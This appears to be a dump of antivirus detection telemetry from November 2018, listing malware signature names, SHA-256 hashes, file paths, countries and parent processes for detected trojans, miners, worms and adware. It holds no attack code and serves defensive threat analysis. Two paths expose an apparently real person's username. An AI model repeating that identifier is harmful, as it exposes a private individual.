  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:21:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='atu.exe', filepath='E:\\ATU.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T13:56:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224917-e2b3c6a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-202113-A73A1DA0\\AVSCAN-20181104-224917-E2B3C6A1', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225431-08f117b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-201403-72C9CBBB\\AVSCAN-20181104-225431-08F117B2', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:54:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141909-033482ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4bc5556\\AVSCAN-20181104-141859-00D51456\\AVSCAN-20181104-141909-033482EF', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173350-4fb81144', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd0e46c1\\AVSCAN-20181104-173217-43CD108D\\AVSCAN-20181104-173350-4FB81144', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='36706adf4832b5785a472241af4bad550aa715084826a596ca8462755f0cd3a2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:33:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001755-90016054', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001755-90016054', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:47:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T12:30:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chrome.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\ir_ext_temp_0\\chrome.exe', filesize=640000, name='TR/AD.Bladabindi.Y.#M1.#R1'), hash='a7a2476d386b8ccdb7cb7b88574c1b787af474223b2cac7bb0c25f946598b608', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\ir_ext_temp_0\\AutoPlay\\Docs\\Windows Loader.exe', parentsize=1891568, timestamp='2018-11-04T15:35:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\AVIRA\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T17:19:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0006478.exe', filepath='M:\\System Volume Information\\_restore{c8661163-1c47-45e6-a598-861fbe8ce6b2}\\rp13\\A0006478.exe', filesize=1024000, name='HEUR/AGEN.1034691.#M1.#R1'), hash='32e34bec9f0f382af7e83ae78c67f95d103f7eaaf61e24c713d0c62f263fef61', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T20:25:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T22:08:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winpresetup32.exe', filepath='C:\\Users\\X\\Desktop\\WinSetupFromUSB-1-7\\files\\winsetup\\WinPreSetup32.exe', filesize=1152000, name='W32/Virut.Gen.#M1.#R1'), hash='0c1c9f197b0e4394a36788076dab90ecb8fa1a2934ec2da4273921889e52f245', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:39:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132416-523df985', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132416-523DF985', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T06:13:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6553239\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/ads:1 \\\\\\/host:ZMR0dF7rWwMpnHVgTPgUEi2KcWBA7xlOI4B0YUu5GhUl0i06ZrNJUwrfKDB5+hoAGJR+JSqkOkxEy0ktMbk6CAOJb1smu19iFYttUiSlCCpBk9S8 \\\\\\/mnl', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Cadillacs and Dinosaurs US 930201_3751936970.exe', parentsize=2360912, timestamp='2018-11-04T20:14:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rlistupdater', filepath='/Library/Application Support/Malwarebytes/MBAM/Quarantine/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:45:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='D:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T08:56:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211201-d8f6954a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-211201-D8F6954A', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T06:41:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135223-d4f56872', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9336ead\\AVSCAN-20181104-135141-D10A149A\\AVSCAN-20181104-135223-D4F56872', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:51:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scvhost.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Update\\scvhost.exe', filesize=448000, name='APPL/BitCoinMiner.5.12.#M1.#R1'), hash='06c5e86be6dca55eda888cd820a30394eba9b9b69d2887f3d652a139ae00c371', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:58:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182650.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp104\\A0182650.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:35:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='26c6990e060ac6408d69e1cab2b5d912b4e5289b92478028744a7c8e3d927bc5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:50:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:06:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:08:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200623-13519c95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200623-13519C95', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:06:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:16:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:16:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215351-5e6bb6b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215351-5E6BB6B6', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:53:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134223-3cdc9340', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c4301d\\AVSCAN-20181104-133822-1E046ACA\\AVSCAN-20181104-134223-3CDC9340', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-011106-67b1cb12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_abacec2e\\AVSCAN-20181105-010551-2D0A8DFE\\AVSCAN-20181105-011106-67B1CB12', filesize=23500000, name='TR/Taranis.1662.#M1.#R1'), hash='7cf0552889b3eee6f909681b170687cd616552497e887e2624a0aab6cc007137', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:11:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:41:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_208c03b8.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_208c03b8.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='temp1.exe', filepath='\\\\?\\I:\\Ghost\\Fannan NewLook 6 Fin\\Software\\Fannan-Software\\Software\\docs\\Others\\Temp1.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='ce60c2f4422ab3604e16440c41d1184e7fb62430c67af9ad1f827e4eb4916e81', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:43:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125800-c1fb904e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1da9bed9\\AVSCAN-20181104-125744-BF18A8A6\\AVSCAN-20181104-125800-C1FB904E', filesize=9344000, name='TR/Black.Gen2.#M1.#R1'), hash='9cd534d450db8b6b053240cd6d16cb3e3daefd32527d50b8f6ec0866934397c6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T05:58:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kingdom.exe', filepath='\\\\?\\E:\\Alte Daten\\Spiele\\AA managment\\Fairy Kingdom Deluxe\\kingdom.exe', filesize=3072000, name='TR/Crypt.XPACK.Gen.#M300.#R568'), hash='6d4947b8f3ab0fa35eeafec03c479318dc613512d972296a418a870553aa5551', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:47:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c2e2d2c07098f50685d559a6286ff40d2261d831260b6737d2bfe2dffc72f3dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\C2E2D2C07098F50685D559A6286FF40D2261D831260B6737D2BFE2DFFC72F3DD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c2e2d2c07098f50685d559a6286ff40d2261d831260b6737d2bfe2dffc72f3dd', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:17:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150950-b8f9a6b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150950-B8F9A6B2', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rthdcpl.exe', filepath='C:\\Program Files\\Realtek\\InstallShield\\RTHDCPL.exe', filesize=16128000, name='TR/Patched.Gen.#M300.#R2947'), hash='ab648793e83e05a712df2df6abce4747ebb5df986d0be72275408f337c2c8f57', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:xICg5KwPxUah2aTX.1', country='LB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126264, timestamp='2018-11-02T07:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mall.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\MALL\\MALL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tobii_firmware_upgrade.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Tobii\\Service\\tobii_firmware_upgrade.dll', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='a1d6b8cd7cb92d828f99be298044c4d07386481636387045607f4c73a15ab4b8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:35:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fairytreasure_at_tb1.exe', filepath='\\\\?\\C:\\Downloads\\fairytreasure_at_tb1.exe', filesize=20460000, name='HEUR/APC.#M1.#R1'), hash='dd9b9ecbaeb13352a7be99181168c8989f671e3f80e6054128b3ce573e6ce5b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='162037232.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\162037232.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-02T20:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\75EFA335D6E6FA39037E5B8D36CB2330A618CC2B15AD2485F6296517B8E2D9E2', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mfskwkw.exe', filepath='c:\\users\\X\\appdata\\roaming\\mfskwkw.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T13:24:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:26:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsw7C67.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:49:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T18:58:39Z'), dt=datetime.date(2018, 11, 2)),
